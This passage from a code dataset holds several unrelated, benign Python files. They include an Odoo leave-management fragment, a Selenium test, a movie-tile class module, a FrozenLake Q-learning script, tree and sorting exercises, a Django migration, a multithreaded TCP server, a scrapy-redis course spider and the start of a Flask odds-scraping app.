result['domain'] = {'holiday_status_id':[('id','in',leave_type_list)]}\n else:\n return {'warning': {'title': 'Leave Warning', 'message': 'No Leave Structure Found! \\n Please configure leave structure for current employee from employee\\'s profile!'},\n 'domain':result['domain']}\n\n for record in self:\n record.next_manager_id = record.employee_id and record.employee_id.parent_id.id or False\n record.holiday_status_id = record.holiday_status_id and record.holiday_status_id.id or False\n\n if self._context.get('off_in_lieu', False):\n leave_status = self.env['hr.holidays.status'].search([('name', '=', 'OIL')], limit=1)\n if leave_status:\n return {'domain': {'holiday_status_id': [('id', 'in', [leave_status.id])]}}\n else:\n return {'domain': {'holiday_status_id': [('id', 'in', [])]}}\n\n return result\n","sub_path":"beta-dev1/propell_modules/sg_leave_types/models/hr_holidays.py","file_name":"hr_holidays.py","file_ext":"py","file_size_in_byte":51718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"642162139","text":"'# -*- coding: utf-8 -*-'\nimport time\n\nfrom data.data_rare.mng_data import url\n\n\ndef test_open_morrocana(app):\n app.open(url)\n app.morrocana.check_Page()\ndef test_home_Treatment_Mask(app):\n features = app.driver.find_elements_by_css_selector('.feature-box.hidden-xs')\n for c in features:\n time.sleep(2)\n clp = c.find_element_by_css_selector('.box-content>span').text\n media = c.find_element_by_css_selector('.box-image>img').get_attribute('src')\n print(\"Feature :\"+clp, media)\n\n # panels = app.driver.find_elements_by_css_selector('.panel-block-row')\n # for p in panels:\n # app.scroll(p)\n\n # slider = app.driver.find_element_by_css_selector('.table-container')\n # app.scroll(slider)\n # clicker = slider.find_elements_by_css_selector('.tabs-container>label')\n #\n # for c in clicker:\n # app.scroll(c)\n # if c.get_attribute('class')==('active'):\n # title = slider.find_element_by_css_selector('.title')\n # print(title.text)\n # time.sleep(3)\n # elif c.get_attribute('class') != ('active'):\n # c.click()\n\n\n\n\n\n\n# https://github.com/pytest-dev/pytest-html","sub_path":"tests_RARE/tests_MNG/test_MNG_ui.py","file_name":"test_MNG_ui.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"346181661","text":"import re\n\n\nclass Media():\n \"\"\" This class describes a media object like a\n movie, tv show or videogame. \n \"\"\"\n \n tile_content = '''\n
        \n \n

        {movie_title}

        \n

        Released: {release_date}

        \n
        {body}
        \n
        \n '''\n\n def __init__(self, title, description, image, trailer_url, release_date):\n \"\"\" Constructor for Media object.\n title - (String) the media's title\n description - (String) a description\n image - (String) a link to an image for the media\n trailer_url - (String) a link to the youtube trailer\n release_date - (String) release date of the media\n \"\"\"\n self.title = title\n self.description = description\n self.poster_image_url = image\n self.trailer_youtube_url = trailer_url\n self.release_date = release_date\n\n def getYouTubeId(self):\n \"\"\" returns the id for the media's youtube trailer\n \"\"\"\n youtube_id_match = re.search(\n r'(?<=v=)[^&#]+', self.trailer_youtube_url)\n youtube_id_match = youtube_id_match or re.search(\n r'(?<=be/)[^&#]+', self.trailer_youtube_url)\n return (youtube_id_match.group(0) if youtube_id_match else None)\n\n def getTileContent(self):\n \"\"\" uses the tile content template to create a html div for the media\n object\n \"\"\"\n trailer_youtube_id = self.getYouTubeId()\n description = self.getDescription()\n return Media.tile_content.format(\n movie_title=self.title,\n poster_image_url=self.poster_image_url,\n trailer_youtube_id=trailer_youtube_id,\n release_date=self.release_date,\n body=description)\n\n # get the description of the media object\n def getDescription(self):\n \"\"\" returns the description\n \"\"\"\n return self.description\n\n\nclass Movie(Media):\n \"\"\" This class describes a movie adding a director\n parameter to the Media object\n \"\"\"\n \n def __init__(self, title, description, image,\n trailer_url, release_date, director):\n \"\"\" Constructor for Movie object.\n title - (String) the media's title\n description - (String) a description\n image - (String) a link to an image for the media\n trailer_url - (String) a link to the youtube trailer\n release_date - (String) release date of the media\n director - (String) director of the movie\n \"\"\"\n Media.__init__(self, title, description,\n image, trailer_url, release_date)\n self.director = director\n\n def getDescription(self):\n \"\"\" returns the description adds a 'Directed by'\n statement at the end of the description\n \"\"\"\n return self.description + \" Directed by \" + self.director + \".\"\n\n\nclass VideoGame(Media):\n \"\"\" This class describes a videogame adding a developer\n parameter to the Media object\n \"\"\"\n \n def __init__(self, title, description, image,\n trailer_url, release_date, developer):\n \"\"\" Constructor for VideoGame object.\n title - (String) the media's title\n description - (String) a description\n image - (String) a link to an image for the media\n trailer_url - (String) a link to the youtube trailer\n release_date - (String) release date of the media\n developer - (String) developer of the game\n \"\"\"\n Media.__init__(self, title, description,\n image, trailer_url, release_date)\n self.developer = developer\n\n def getDescription(self):\n \"\"\" returns the description adds a 'Developed by'\n statement at the end of the description\n \"\"\"\n return self.description + \" Developed by \" + self.developer + \".\"\n\n\nclass TelevisionShow(Media):\n \"\"\" This class describes a television adding a network\n parameter to the Media object\n \"\"\"\n \n def __init__(self, title, description,\n image, trailer_url, release_date, network):\n \"\"\" Constructor for TelevisionShow object.\n title - (String) the media's title\n description - (String) a description\n image - (String) a link to an image for the media\n 
trailer_url - (String) a link to the youtube trailer\n release_date - (String) release date of the media\n network - (String) the network the show aired on\n \"\"\"\n Media.__init__(self, title, description,\n image, trailer_url, release_date)\n self.network = network\n\n def getDescription(self):\n \"\"\" returns the description adds a 'Aired on'\n statement at the end of the description\n \"\"\"\n return self.description + \" Aired on \" + self.network + \".\"\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":5058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"193052040","text":"# Dummy Q-Table learning algorithm\nfrom __future__ import print_function\n\nimport gym\nfrom gym.envs.registration import register\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\n\nregister(\n id = 'FrozenLake-v3',\n entry_point = 'gym.envs.toy_text:FrozenLakeEnv',\n kwargs={\n 'map_name': '4x4',\n 'is_slippery': False\n }\n)\n\ndef rargmax(vector):\n # vector: [ 0. 1. 1. 0.]\n # Return the maximum number of an array element.\n m = np.amax(vector) # m = 1.\n # Return the list of indices of the elements that are non-zero and the given condition is True\n indices = np.nonzero(vector == m)[0] # indices = [1, 2]\n return random.choice(indices)\n\nenv = gym.make(\"FrozenLake-v3\")\nenv.render()\n\nprint(\"env.observation_space.n:\", env.observation_space.n)\nprint(\"env.action_space.n:\", env.action_space.n)\nQ = np.zeros([env.observation_space.n, env.action_space.n])\n\n#Discount Factor\ndiscount_factor = .99 # <-- Updated for ver.2\nmax_episodes = 2000\n\n# list to contain total rewards and steps per episode\nrList = []\n\nfor i in range(max_episodes):\n # Reset environment and get first new observation\n state = env.reset()\n rAll = 0\n done = False\n\n # The Q-Table learning algorithm\n while not done:\n #Decaying Random Noise <-- Updated for ver.2\n #e = 0.1 / (i + 1)\n e = 1. 
/ ((i / 50) + 10)\n if np.random.rand(1) < e:\n action = env.action_space.sample()\n else:\n action = rargmax(Q[state, :])\n\n #Decaying Random Noise <-- Updated for ver.2\n #action = np.argmax(Q[state, :] + np.random.randn(1, env.action_space.n) / (i+1))\n\n # Get new state and reward from environment\n new_state, reward, done, info = env.step(action)\n\n # Update Q-Table with new knowledge using learning rate\n Q[state, action] = reward + discount_factor * np.max(Q[new_state, :]) # <-- Updated for ver.2\n\n rAll += reward\n state = new_state\n\n rList.append(rAll)\n\nprint(\"Success rate: \" + str(sum(rList)/max_episodes))\nprint(\"Final Q-Table Values\")\nprint(\"LEFT DOWN RIGHT UP\")\nfor i in range(16):\n for j in range(4):\n print(\"%6.4f\" % Q[i][j], end=\", \")\n print()\nplt.plot(rList)\nplt.ylim(-0.5, 1.5)\nplt.show()","sub_path":"2.ReinforcementLearning/FrozenLake/FrozenLake-2.py","file_name":"FrozenLake-2.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"162006413","text":"from django.urls import path\nfrom .views import (\n AdminHome,\n ArticleCreate,\n ArticleUpdate,\n ArticleDelete,\n Profile,\n UserPanel\n)\n\napp_name = \"account\"\nurlpatterns = [\n path('', AdminHome.as_view(), name='home'),\n path('article/create', ArticleCreate.as_view(), name='article-create'),\n path('article/update/', ArticleUpdate.as_view(), name='article-update'),\n path('article/delete/', ArticleDelete.as_view(), name='article-delete'),\n path('profile/', Profile.as_view(), name='profile'),\n path('user-panel/', UserPanel.as_view(), name='user-panel'),\n]","sub_path":"account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"308281324","text":"import boto3\nimport json\nimport os\nimport logging\nimport re\n\ndef main(event, context):\n translate = boto3.client('translate')\n s3 = boto3.resource('s3')\n dynamodb = boto3.resource(\"dynamodb\")\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n logger.info(event)\n\n record = event['Records'][0]\n bucket = record['s3']['bucket']['name']\n key = record['s3']['object']['key']\n logger.info(key)\n content_object = s3.Object(bucket, key)\n logger.info(content_object)\n file_content = content_object.get()['Body'].read().decode('utf-8')\n logger.info(\"file_content: \" + file_content)\n json_content = json.loads(file_content)\n logger.info(json_content)\n lookup_uuid = key.split('.')[0]\n table_name = os.getenv(\"TABLE\")\n table = dynamodb.Table(table_name)\n table_record = table.get_item(\n Key={\n 'uuid': lookup_uuid,\n }\n )\n logger.info(table_record)\n SOURCE_LANGUAGE = table_record['Item']['input_language'].split('-')[0]\n TARGET_LANGUAGE = table_record['Item']['target_language'].split('-')[0]\n if TARGET_LANGUAGE == 'arb':\n TARGET_LANGUAGE = 'ar'\n elif TARGET_LANGUAGE == 'cmn':\n TARGET_LANGUAGE = 'zh'\n elif TARGET_LANGUAGE == 'nb':\n TARGET_LANGUAGE = 'no'\n \n textToSynthesize = json_content['results']['transcripts'][0]['transcript']\n lastPronunIdx = len(json_content['results']['items']) - 1\n # Get last pronunciation\n while json_content['results']['items'][lastPronunIdx]['type'] != \"pronunciation\":\n lastPronunIdx -= 1\n firstPronunIdx = 0\n # Get first pronunciation\n while json_content['results']['items'][firstPronunIdx]['type'] != \"pronunciation\":\n firstPronunIdx += 1\n job_name = 
json_content[\"jobName\"]\n output_bucket = os.getenv('OUTPUT_BUCKET')\n result = translate.translate_text(\n Text=textToSynthesize,\n SourceLanguageCode=SOURCE_LANGUAGE, \n TargetLanguageCode=TARGET_LANGUAGE,\n )\n\n start = float( json_content['results']['items'][firstPronunIdx][\"start_time\"])\n end = float(json_content['results']['items'][lastPronunIdx][\"end_time\"])\n\n textToGetPhrases = result[\"TranslatedText\"]\n\n phrases = getPhrasesFromTranslation(textToGetPhrases, start, end)\n logger.info(\"phrases: \" + str(phrases))\n srtContent = writeSRT( phrases )\n\n logger.info(srtContent)\n output_name = job_name + \".srt\"\n s3object = s3.Object(output_bucket, output_name)\n s3object.put(\n Body=(bytes(srtContent.encode('utf-8')))\n )\n\n# Create phrases from translation input from aws translate\ndef getPhrasesFromTranslation( translation, start, end ):\n\n words = translation.split()\n phrase = { 'start_time': '', 'end_time': '', 'words' : [] }\n phrases = []\n nPhrase = True\n x = 0\n c = 0\n\n for word in words:\n\n # If it is a new phrase, then get the start_time of the first item\n if nPhrase == True:\n nPhrase = False\n c += 1\n\n # Append the word to the phrase...\n phrase[\"words\"].append(word)\n x += 1\n\n # Add the phrase to the phrases, generate a new phrase, etc.\n if x == 10:\n phrases.append(phrase)\n phrase = { 'start_time': '', 'end_time': '', 'words' : [] }\n nPhrase = True\n x = 0\n\n if(len(phrase['words']) > 0):\n phrases.append(phrase)\n\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n logger.info(\"C: \" + str(c))\n logger.info(\"Generated Phrases\" + str(phrases))\n\n timeDelta = (end-start) / c\n time = start\n for phraseIdx in range(len(phrases)):\n phrases[phraseIdx]['start_time'] = getTimeCode(time + 0.01)\n time += timeDelta\n phrases[phraseIdx]['end_time'] = getTimeCode(time)\n\n return phrases\n\n\n# Create SRT file from phrases\ndef writeSRT( phrases ):\n\n output = \"\"\n x = 1\n \n for phrase in phrases:\n \n output += str(x) + \"\\n\" \n x += 1\n output += phrase[\"start_time\"] + \" --> \" + phrase[\"end_time\"] + \"\\n\" \n # Format words\n out = getPhraseText( phrase )\n output += out + \"\\n\\n\" \n\n return output\n\n\n# Format words to add proper spacing\ndef getPhraseText( phrase ):\n\n length = len(phrase[\"words\"])\n\n out = \"\"\n for i in range( 0, length ):\n if re.match('[a-zA-Z0-9]', phrase[\"words\"][i]):\n if i > 0:\n out += \" \" + phrase[\"words\"][i]\n else:\n out += phrase[\"words\"][i]\n else:\n out += phrase[\"words\"][i]\n \n return out\n\n# Turn seconds into formatted time code for SRT\ndef getTimeCode( seconds ):\n t_hund = int(seconds % 1 * 1000)\n t_seconds = int( seconds )\n t_secs = ((float( t_seconds) / 60) % 1) * 60\n t_mins = int( t_seconds / 60 )\n return str( \"%02d:%02d:%02d,%03d\" % (00, t_mins, int(t_secs), t_hund ))\n","sub_path":"cicero/lambda/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":4900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"435753342","text":"\"\"\"This 'testing' executor is built to be run in the vagrant VM.\n\nIt is basically the same as the normal Hyaline executor except that it doesn't rely on HDFS.\n\"\"\"\n\nimport os\nimport sys\nimport stat\nfrom hyaline.common.log import HyalineLogger\nlog = HyalineLogger()\nfrom hyaline.common.pkgutil import unpack_assets\nfrom hyaline.executor.mysql_task_control import MySQLTaskControlProvider\nfrom hyaline.executor.executor import 
HyalineExecutor\nfrom hyaline.executor.hyaline_task_runner import HyalineTaskRunnerProvider\nfrom hyaline.executor.binary_mysql_installer import BinaryMysqlInstallerProvider\nfrom hyaline.executor.sandbox import Sandbox\nfrom hyaline.executor.backup import NoopBackupStoreProvider\nfrom twitter.common.dirutil import safe_mkdir\nfrom twitter.common import app\nfrom twitter.common.log.options import LogOptions\nimport json\nimport mesos.native\nimport string\n\n\nHYALINE_MODULE = 'hyaline.executor'\nASSET_RELPATH = 'files'\nAGENTDIR = \"mesos-agent-workdir\"\n\ndef chmod_scripts(path):\n \"\"\"Make scripts executable.\"\"\"\n if path.endswith('.sh'):\n st = os.stat(path)\n os.chmod(path, st.st_mode | stat.S_IEXEC)\n\n\n# LogOptions.disable_disk_logging()\n# LogOptions.set_stderr_log_level('google:INFO')\n\ndef proxy_main():\n app.add_option(\n '--task_id',\n dest='task_id',\n default=None,\n help='task_id')\n app.add_option(\n '--executor_log_dir',\n dest = 'executor_log_dir',\n default = None,\n help = 'executor_log_dir')\n app.add_option(\n '--log_delete_timeout',\n dest = 'log_delete_timeout',\n default = None,\n help = 'log_delete_timeout')\n app.add_option(\n '--log_group_number',\n dest = 'log_group_number',\n default = None,\n help = 'log_group_number')\n app.add_option(\n '--log_switch_size',\n dest = 'log_switch_size',\n default = None,\n help = 'log_switch_size')\n app.add_option(\n '--log_clean_hour',\n dest = 'log_clean_hour',\n default = None,\n help = 'log_clean_hour')\n app.add_option(\n '--log_clean_minite',\n dest = 'log_clean_minite',\n default = None,\n help = 'log_clean_minite')\n def main(args, options):\n # 'sandbox' directory resides under the working directory assigned by the Mesos slave.\n #####################################\n # committer: mahongchao\n # commit_time:2016-08-26\n ####################################\n task_id = options.task_id\n log_configure = dict(log_dir=str(options.executor_log_dir),\n log_group_number=str(options.log_group_number),\n log_delete_timeout=str(options.log_delete_timeout),\n log_switch_size=str(options.log_switch_size),\n log_clean_hour=str(options.log_clean_hour),\n log_clean_minite=str(options.log_clean_minite))\n log_dir = os.path.join(log_configure[\"log_dir\"], task_id)\n safe_mkdir(log_dir)\n log.set_log(os.path.join(log_dir, \"hyaline-executor-info\"),\n os.path.join(log_dir, \"hyaline-executor-error\"),\n int(log_configure[\"log_switch_size\"]),\n int(log_configure[\"log_group_number\"]),\n int(log_configure[\"log_delete_timeout\"]),\n screen=True)\n sys.stderr = log.stderr_redirect\n log.info(\"Start hyaline executor.\")\n now = os.path.realpath('.')\n l = []\n for a, b, c in os.walk(now):\n for d in b:\n if \"volume-\" in d:\n l.append(d)\n detailed_path = {}\n if len(l) > 0:\n num = [int(string.split(v, \"-\")[1]) for v in l]\n min_l = \"volume-\" + str(min(num))\n for i in num:\n volume_link = os.path.join(now, \"volume-\"+str(i))\n os.chdir(volume_link)\n detailed_path[i] = os.path.realpath('.')\n\n sandbox_link = os.path.join(now, min_l)\n os.chdir(sandbox_link)\n volumes_dir = os.path.realpath('.')\n\n else:\n volumes_dir = now\n\n executor = HyalineExecutor(\n HyalineTaskRunnerProvider(\n MySQLTaskControlProvider(),\n BinaryMysqlInstallerProvider(), # Do not install any package.\n NoopBackupStoreProvider(),\n log_configure), # Do not recover any state.\n volumes_dir,detailed_path)\n ##################################################\n driver = mesos.native.MesosExecutorDriver(executor)\n driver.run()\n\n 
log.info('Exiting executor.')\n\n app.main()\n","sub_path":"hyaline/executor/hyaline_executor.py","file_name":"hyaline_executor.py","file_ext":"py","file_size_in_byte":4455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"254054160","text":"import sys\nsys.path.append('../BinarySearchTree/Src')\n\nimport copy\n\nfrom ArrayNodeTree import ArrayNodeTree\n\n# Print a tree in spiral order. To see what a spiral order is checkout below\n# http://www.geeksforgeeks.org/level-order-traversal-in-spiral-form/\n# So basically, this is a twist on BFS in which we alternate the order of printing at each level\n# This can be seen as a variation on printNodesByLevel() where we use a temp stack instead of a queue\ndef spiralOrderTraversal(treeNode):\n queue = []\n tempStack = []\n tempStack.append(treeNode)\n reverse = True\n while len(tempStack) != 0:\n lengthOfStack = len(tempStack)\n for i in range (lengthOfStack):\n queue.append(tempStack.pop()) # The difference between printNodesByLevel is here and *\n while len(queue) != 0:\n node = queue.pop(0) # and here *\n print(node.value)\n # We need to reverse the order of addition to the list at each level\n if(reverse):\n if node.leftPointer != None:\n tempStack.append(node.leftPointer)\n if node.rightPointer != None:\n tempStack.append(node.rightPointer)\n else:\n if node.rightPointer != None:\n tempStack.append(node.rightPointer)\n if node.leftPointer != None:\n tempStack.append(node.leftPointer) \n reverse = not reverse\n\n# Program to count leaf nodes in a binary tree\n# We use the usual technique - leaf nodes of tree = leaf nodes of left subtree + leaf nodes of right subtree\n# This is almost just like the size of tree question, except we only count the leafs\ndef countLeafNodes(treeRoot):\n if treeRoot.leftPointer == None and treeRoot.rightPointer == None:\n return 1\n leftTreeLeafNodesCount = 0\n rightTreeLeafNodesCount = 0\n if treeRoot.leftPointer != None:\n leftTreeLeafNodesCount = countLeafNodes(treeRoot.leftPointer)\n if treeRoot.rightPointer != None:\n rightTreeLeafNodesCount = countLeafNodes(treeRoot.rightPointer)\n return leftTreeLeafNodesCount + rightTreeLeafNodesCount \n\n# Determine if Two Trees are Identical\n# Two trees are identical when they have same data and arrangement of data is also same.\n# Note that 2 trees with the same pre/post order traversals may not be identical. This is easily seen\n# by considering that we can switch the execution of the recursive call to the left and right subtree in\n# in both traversals and not see a difference for parents of leaf nodes\n# Proof that 2 trees with the same in-order traversal may not be identical \n# http://stackoverflow.com/questions/1136999/reconstructing-a-tree-from-its-preorder-and-postorder-lists?lq=1\n# However, if 2 trees have the same in-order AND pre-order traversals, then they are identical\n# 2 Trees are identical if the current nodes are identical and the left and right subtrees are identical \ndef isIdentical(treeRoot, otherTreeRoot):\n if treeRoot is None and otherTreeRoot is None:\n return True\n elif treeRoot is not None and otherTreeRoot is not None:\n if treeRoot.value == otherTreeRoot.value:\n return isIdentical(treeRoot.leftPointer, otherTreeRoot.leftPointer) and isIdentical(treeRoot.rightPointer, otherTreeRoot.rightPointer) \n return False\n\n# Given pointers to two nodes in a Binary Tree, write a program to find the Lowest Common Ancestor (LCA) \n# We can use a generalization of the BST idea for this. 
If a node in the BST has one of the pointers in the left subtree and the other\n# in the right subtree then this is the LCA. Else, we recurse on the side of the node that has both pointers\n#\n# This function has 2 kinds of return values. \n# It returns the LCA of node1 and node2 in the subtree rooted at treeRoot if both node1 and node2 are found in this subtree.\n# In the case that only one of the nodes is found in the subtree, then returns a pointer to that node\n# If none of the nodes are found, returns None\n# Hence, if a node has a pointer returned from the subtree rooted at the leftPointer and a node returned from a subtree\n# rooted at the right pointer, this must mean that the node is the LCA\n# For all parents of this LCA node, the LCA node will be returned \ndef returnBinaryTreeLCA(treeRoot, node1, node2):\n if treeRoot is None:\n return None\n \n # If the treeRoot is one of the targeted nodes, then the subtree contains one of the targeted nodes\n if treeRoot == node1 or treeRoot == node2:\n return treeRoot\n \n # Check which of the subtrees contains the nodes\n leftSubtreeResult = returnBinaryTreeLCA(treeRoot.leftPointer, node1, node2)\n rightSubtreeResult = returnBinaryTreeLCA(treeRoot.rightPointer, node1, node2)\n \n # If both subtrees contain the nodes, then 1 subtree must contain one of the nodes and the other\n # subtree must contain the other. Thus, the current node is the LCA\n if leftSubtreeResult is not None and rightSubtreeResult is not None:\n return treeRoot\n \n # If the left subtree contains a node and the right subtree contains no nodes, then\n # the left subtree must contain both nodes\n if leftSubtreeResult is not None and rightSubtreeResult is None:\n return leftSubtreeResult\n \n # If the right subtree contains a node and the left subtree contains no nodes, then\n # the right subtree must contain both nodes \n if leftSubtreeResult is None and rightSubtreeResult is not None:\n return rightSubtreeResult\n \n # Leaf nodes\n if leftSubtreeResult is None and rightSubtreeResult is None:\n return None\n\nif __name__ == \"__main__\":\n \n testTree = ArrayNodeTree()\n testTree.randomize(10)\n print(\"---\")\n \n #copyTree = copy.deepcopy(testTree)\n #print(isIdentical(copyTree.root, testTree.root))\n #print(countLeafNodes(testTree.root))\n #spiralOrderTraversal(testTree.root)","sub_path":"Data_Structures/Trees/Questions/Set1.py","file_name":"Set1.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"254823153","text":"def comparator(val_a, val_b):\n \"\"\"\n Default comparator, checks if val_a > val_b\n @param {number} val_a\n @param {number} val_b\n @return {bool} : True if val_a > val_b else False\n \"\"\"\n return val_a > val_b\n\n\ndef bubble(l, comparator=comparator):\n \"\"\"\n Bubble sort a given list\n @param {list} l - the list to sort\n @param {function(arg_a, arg_b)} - comparator\n function reference\n If return value is True, indices with values arg_a and arg_b will be swapped\n Default:\n comparator(val_a, val_b):\n return val_a > val_b\n @return {tuple(list, number)} - (sorted list, number of iterations) \n \"\"\"\n # outer bubble\n sweeps = 0\n for i in range(len(l) - 1, 0, -1):\n sweeps += 1\n is_sorted = True\n for j in range(i):\n if(comparator(l[j], l[j+1])):\n is_sorted = False\n swap(l, j, j+1)\n if is_sorted:\n break\n return (l, sweeps)\n\n\ndef swap(l, index_a, index_b):\n \"\"\"\n Swaps two indices in a list\n @param {list} l - the list\n @param {number} index_a -
The first index\n @param {number} index_b - The second index\n \"\"\"\n tmp = l[index_a]\n l[index_a] = l[index_b]\n l[index_b] = tmp\n","sub_path":"sorting/Bubble_Sort/python/bubble.py","file_name":"bubble.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"310536464","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 26 09:36:52 2019\n\n@author: heimi\n\"\"\"\n\n\nclass fastextConfig():\n VOC_DIM=100 ##100\n WORD_NGRAMS=2\n INIT_LEARN_RATE=0.01 ##0.001\n EPOCH_MAX=5\n IS_PRE_TRAIN=False\n MODEL_ID='fasttext_tagpack' ###good\n\n \n \n \n\nclass cnnConfig():\n GPU_DEVICES='-1' ##-1:CPU \n SEQ_LEN=40 #100\n MAX_WORDS=20000 ##20000 #5000\n VOC_DIM=100 ##100\n BATCH_SIZE=128##64 ###64\n INIT_LEARN_RATE=0.001 ##0.001\n EPOCH_MAX=50\n DROP_OUT_RATE=0.5 ###0.3\n EARLY_STOP_COUNT=6\n IS_PRE_TRAIN=False\n IS_STEM=True\n EMBED_TRAINABLE=True\n Y_NAME_LIST=['output1','output2']\n# MODEL_ID='cnn_model' ###good\n MODEL_ID='fasttext_model_test' ###good\n \n \n\n","sub_path":"Meorient/my_tagpack0809/fasttext_config.py","file_name":"fasttext_config.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"92893474","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('rango', '0040_auto_20160619_1446'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='userprofile',\n name='level',\n field=models.IntegerField(default=1),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='order',\n name='b_date',\n field=models.DateField(default=datetime.datetime(2016, 6, 19, 19, 56, 53, 109962)),\n ),\n migrations.AlterField(\n model_name='order',\n name='r_date',\n field=models.DateField(default=datetime.datetime(2016, 6, 19, 19, 56, 53, 110026)),\n ),\n ]\n","sub_path":"rango/migrations/0041_auto_20160619_1956.py","file_name":"0041_auto_20160619_1956.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"132563426","text":"#encoding=utf-8\n#tcp-server, multithreaded\n\nfrom socket import *\nimport threading\nimport time\n\nMAX_TO_CONN = 3\nBUFSIZ = 1024\nCODING = 'utf-8'\nHOST='0.0.0.0'\nPORT=21566\n\nclass Server(threading.Thread):\n\n def __init__(self, host=HOST, port=PORT):\n \"\"\"\n :param host: ip of server\n :param port: port of the server\n \"\"\"\n super().__init__()\n self.serv_host = host\n self.serv_port = port\n self.tcpS = socket(AF_INET, SOCK_STREAM) # create the socket object\n self.tcpS.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) # set the socket option to reuse ip and port\n self.tcpS.bind((host,port)) # bind ip and port\n self.tcpS.listen(MAX_TO_CONN) # set the maximum number of connections\n\n def deal_client(self,conn, addr):\n\n def send_client_msg(send_msg):\n conn.send(str(len('{}'.format(send_msg).encode(CODING))).encode(CODING)) # send the byte length of msg to the connected client\n conn.send(send_msg.encode(CODING)) # send the message to the connected client\n\n while True:\n data = \"\"\n try:\n data_size = conn.recv(BUFSIZ).decode(CODING) # get the byte length of the incoming data\n while len(data.encode(CODING)) < int(data_size): # keep receiving until all data has arrived\n data += conn.recv(BUFSIZ).decode(CODING) # msg from client\n except Exception:\n print(\"error while receiving from client {}, closing the socket\\n\".format(addr))\n break\n else:\n if data == \"exit()\":\n print(\"receive exit() from {}, closing the
socket\\n\".format(addr))\n break\n msg = '{} server receive context form {}:>{}'.format(time.strftime(\"%Y-%m-%d %X\"),addr, data)\n print(msg)\n send_msg = \"s\" * 2048 + \"拥有了\"\n send_client_msg(send_msg)\n conn.close() # 关闭客户端链接\n\n def run(self):\n print(\"server strat success,listening...\")\n while True:\n conn, addr = self.tcpS.accept()\n print(\"add client->\", addr)\n client = threading.Thread(target=self.deal_client, args=(conn, addr))\n client.start()\n\n\n\nif __name__ == '__main__':\n serv = Server()\n serv.run()\n","sub_path":"《Python从入门到精通 明日科技》python自学笔记/26,网络编程/TCP编程/6 收发较大数据/Server_thread.py","file_name":"Server_thread.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"131809998","text":"# -*- coding: utf-8 -*-\nimport scrapy, re\nfrom csdnspider.items import CsdnspiderItem\nfrom scrapy_redis.spiders import RedisSpider\n\nclass CsdnSpider(RedisSpider):\n '''此类继承了RedisSpider,负责主要的爬取功能'''\n name = 'csdn'\n #allowed_domains = ['edu.csdn.net/courses/k']\n #start_urls = ['http://edu.csdn.net/courses/k/']\n redis_key = 'csdnspider:start_urls' # Redis内的键值对\n\n def __init__(self, *args, **kwargs):\n '''\n 初始方法,设置在redis的配置\n :param args:\n :param kwargs:\n '''\n domain = kwargs.pop('domain', '')\n self.allowed_domains = filter(None, domain.split(','))\n super(CsdnSpider, self).__init__(*args, **kwargs)\n\n def parse(self, response):\n '''\n 爬虫具体数据的处理\n :param response: 网页返回参数\n :return: yield item\n '''\n item = CsdnspiderItem()\n item['title'] = response.xpath(\".//*[@id='course_detail_block1']/div/div[2]/h1/text()\").extract_first().strip() # 标题\n item['hours'] = response.xpath(\".//*[@id='course_detail_block1']/div/div[2]/div[1]/span[2]/text()\").extract_first() # 课时长度\n item['teacher'] = response.xpath(\".//div[@class='professor_name']/a/text()\").extract_first() # 讲师\n item['people'] = response.xpath(\".//*[@id='course_detail_block1']/div/div[2]/div[2]/span[2]/text()\").extract_first() # 适合人群\n item['number'] = response.xpath(\".//*[@id='course_detail_block1']/div/div[2]/div[2]/span[3]/span[2]/text()\").extract_first() # 参加人数\n item['price'] = response.xpath(\".//div[@class='sale']/span[@class='money']/text()\").extract_first().strip() # 价格\n item['desciption'] = response.xpath(\".//div[@class='outline_discribe_box J_outline_discribe_box']/span/text()\").extract_first().strip() # 介绍\n\n #print(item)\n yield item\n\n","sub_path":"ClassHomeWork/Week10/csdnspider/csdnspider/spiders/csdn.py","file_name":"csdn.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"603775285","text":"from flask import Flask, render_template, request, jsonify\nimport json\nfrom flask_sqlalchemy import SQLAlchemy\nfrom scrapping.bet365 import bet365_scrapping\nfrom scrapping.bet10 import bet10_scrapping\nfrom scrapping.titanbet import titan_scrapping\nfrom scrapping.betfred import betfred_scrapping\nfrom scrapping.coral import 